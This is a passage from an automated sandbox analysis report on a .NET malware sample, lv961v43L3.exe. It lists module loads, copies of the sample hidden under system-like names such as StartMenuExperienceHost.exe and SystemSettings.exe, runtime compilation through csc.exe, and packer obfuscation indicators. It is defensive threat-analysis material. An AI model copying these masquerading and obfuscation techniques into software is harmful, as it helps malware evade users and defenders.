                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: sspicli.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: mscoree.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: apphelp.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: version.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: wldp.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: profapi.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: sspicli.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: mscoree.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: version.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: wldp.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: profapi.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: sspicli.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: mscoree.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: apphelp.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: version.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: uxtheme.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: windows.storage.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: wldp.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: profapi.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: cryptsp.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: rsaenh.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: cryptbase.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: sspicli.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: mscoree.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: version.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: uxtheme.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: windows.storage.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: wldp.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: profapi.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: cryptsp.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: rsaenh.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: cryptbase.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: sspicli.dll
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeSection loaded: mscoree.dll
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeSection loaded: apphelp.dll
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeSection loaded: version.dll
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeSection loaded: wldp.dll
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeSection loaded: profapi.dll
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeSection loaded: sspicli.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: mscoree.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: version.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: wldp.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: profapi.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: sspicli.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: ktmw32.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: amsi.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: userenv.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: winnsi.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: rasapi32.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: rasman.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: rtutils.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: mswsock.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: winhttp.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: winmm.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: winmmbase.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: mmdevapi.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: devobj.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: ksuser.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: avrt.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: audioses.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: powrprof.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: umpdc.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: msacm32.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: midimap.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: edputil.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: dwrite.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: windowscodecs.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeSection loaded: dpapi.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: mscoree.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: version.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: uxtheme.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: windows.storage.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: wldp.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: profapi.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: cryptsp.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: rsaenh.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: cryptbase.dll
                              Source: C:\Users\Default\SystemSettings.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\lv961v43L3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                              Source: lv961v43L3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: lv961v43L3.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                              Source: lv961v43L3.exeStatic file information: File size 3554304 > 1048576
                              Source: lv961v43L3.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x363400
                              Source: lv961v43L3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.pdb source: lv961v43L3.exe, 00000000.00000002.2080922506.0000000002DBD000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\10rvn1je\10rvn1je.pdb source: lv961v43L3.exe, 00000000.00000002.2080922506.0000000002DBD000.00000004.00000800.00020000.00000000.sdmp

                              Data Obfuscation

                              barindex
                              .NET source code contains method to dynamically call methods (often used by packers)
                              Source: lv961v43L3.exe, XeaT1JbyC0lPOYGQiqr.cs.Net Code: Type.GetTypeFromHandle(gL6qfioqVfkaUaSwYWI.aPNIn682S6n(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(gL6qfioqVfkaUaSwYWI.aPNIn682S6n(16777245)),Type.GetTypeFromHandle(gL6qfioqVfkaUaSwYWI.aPNIn682S6n(16777259))})
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.cmdline"
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\10rvn1je\10rvn1je.cmdline"
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\10rvn1je\10rvn1je.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 0_2_00007FF848F2535B push esp; ret 0_2_00007FF848F25361
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 0_2_00007FF848F2475D push ebp; iretd 0_2_00007FF848F24760
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 0_2_00007FF8492E8E39 push 8B495D38h; iretd 0_2_00007FF8492E8E3F
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 0_2_00007FF8492E752C push ebx; iretd 0_2_00007FF8492E756A
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 0_2_00007FF8492E7914 push ebx; retf 0_2_00007FF8492E796A
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 0_2_00007FF8492E6F2D pushad ; retf 0_2_00007FF8492E6F59
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeCode function: 7_2_00007FF848F4535B push esp; ret 7_2_00007FF848F45361
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeCode function: 7_2_00007FF848F4475D push ebp; iretd 7_2_00007FF848F44760
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeCode function: 9_2_00007FF848F39003 push esi; retf 9_2_00007FF848F39009
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeCode function: 9_2_00007FF848F2535B push esp; ret 9_2_00007FF848F25361
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeCode function: 9_2_00007FF848F2475D push ebp; iretd 9_2_00007FF848F24760
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeCode function: 9_2_00007FF848F58167 push ebx; ret 9_2_00007FF848F5816A
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 32_2_00007FF848F78167 push ebx; ret 32_2_00007FF848F7816A
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 32_2_00007FF848F58FFF push esi; retf 32_2_00007FF848F59009
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 32_2_00007FF848F4535B push esp; ret 32_2_00007FF848F45361
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 32_2_00007FF848F4475D push ebp; iretd 32_2_00007FF848F44760
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 33_2_00007FF848F1535B push esp; ret 33_2_00007FF848F15361
                              Source: C:\Users\user\Desktop\lv961v43L3.exeCode function: 33_2_00007FF848F1475D push ebp; iretd 33_2_00007FF848F14760
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 34_2_00007FF848F68167 push ebx; ret 34_2_00007FF848F6816A
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 34_2_00007FF848F49003 push esi; retf 34_2_00007FF848F49009
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 34_2_00007FF848F41C76 push ss; iretd 34_2_00007FF848F41C77
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 34_2_00007FF848F3535B push esp; ret 34_2_00007FF848F35361
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 34_2_00007FF848F3475D push ebp; iretd 34_2_00007FF848F34760
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 35_2_00007FF848F3535B push esp; ret 35_2_00007FF848F35361
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeCode function: 35_2_00007FF848F3475D push ebp; iretd 35_2_00007FF848F34760
                              Source: C:\Users\Default\SystemSettings.exeCode function: 36_2_00007FF848F39003 push esi; retf 36_2_00007FF848F39009
                              Source: C:\Users\Default\SystemSettings.exeCode function: 36_2_00007FF848F31C6F push ss; iretd 36_2_00007FF848F31C77
                              Source: C:\Users\Default\SystemSettings.exeCode function: 36_2_00007FF848F58167 push ebx; ret 36_2_00007FF848F5816A
                              Source: C:\Users\Default\SystemSettings.exeCode function: 36_2_00007FF848F2535B push esp; ret 36_2_00007FF848F25361
                              Source: C:\Users\Default\SystemSettings.exeCode function: 36_2_00007FF848F2475D push ebp; iretd 36_2_00007FF848F24760
                              Source: C:\Users\Default\SystemSettings.exeCode function: 37_2_00007FF848F3535B push esp; ret 37_2_00007FF848F35361
                              Source: lv961v43L3.exe, TujY6HGm5qNOHPbwAch.csHigh entropy of concatenated method names: 'k4hZ0QhDBJ', 'SJ0Z15qQhX', 'Yd7', 'pfiZI50fLd', 'b8qZfCYqb1', 'VSAZLl4AFg', 'EjdZnqwHOB', 'dOdVob1gAHNBOZTILTce', 'zv1miD1g8X9N4Z7A945c', 'L4LuuE1gJRBV43ed6J38'
                              Source: lv961v43L3.exe, JSS1AAHJyeaFYno5E2G.csHigh entropy of concatenated method names: 'qVaHpRa2Ry', 'pRkHbTb4Wi', 'WSpH7mplvx', 'XA4YPt12fgL0X86PDcNo', 'vHOl0Z121oSFXaFNeUt5', 'k60efU12Ii4Q8kmOYuFc', 'uCofl112LShTF2DuxSkK', 'Gkd9VM12nIDslkxnRdH9'
                              Source: lv961v43L3.exe, NEXg82fxFF2xk1ensv0.csHigh entropy of concatenated method names: 'sT1fdVG7Su', 'gCffP0n5St', 'sVOfSX94pd', 'EwLwPK1CSohV0Gm9loaB', 'F45N481C2T5jlZ5Od1NY', 'WB8He91Cd2XLclyPxsjR', 'efG1g11CP65i6JN8IadF', 'YdNfXHQZYC', 'e7SfCabjQH', 'UDNfGa8jiS'
                              Source: lv961v43L3.exe, H7HcGHHT062VFBrHy0T.csHigh entropy of concatenated method names: 'mDhHHLEqNu', 'qkvHxIX7o6', 'GWgHUPuAjx', 'bs2HXxwamd', 'NFEHCy8aix', 'xcXZKm1SRFNHAo6SBO9M', 'nE47fe1SgeUbnxvUqBW9', 'LP5DpW1S47PSrdehfSY8', 'sLds2D1S8vU9av5ApMMa', 'FNONHU1SJFih8tAOh4Nj'
                              Source: lv961v43L3.exe, aMJd9DJZYZi3nwt9u3n.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'BaIJMt5Ok3', 'H457SG1p6j5Ndd4HyeDt', 'Cp3vKX1pdcWd4GDS5lWI', 'DHPiAE1pPK3ON7t4epXe', 'RL1lJf1pSOhXdMcYcQah', 'fqRrtX1p2nRkKPy8erRE', 'pXcDV51pB1chvBpYriFQ'
                              Source: lv961v43L3.exe, Kdg8W6V5CSvpojNOcQt.csHigh entropy of concatenated method names: 'fj1njR1dWl08wSqI9YSW', 'Dgn9oh1dy9MJaNKwTX4H', 'b0qGZe1dEqUi8RnhecKt', 'CZTE6W1dsj6yPQItBc62', 'FU1jMP1d5DliCiOETY2F', 'method_0', 'method_1', 'eytVyVnEB6', 'ic4VErrYFX', 'RDiVhNUoyg'
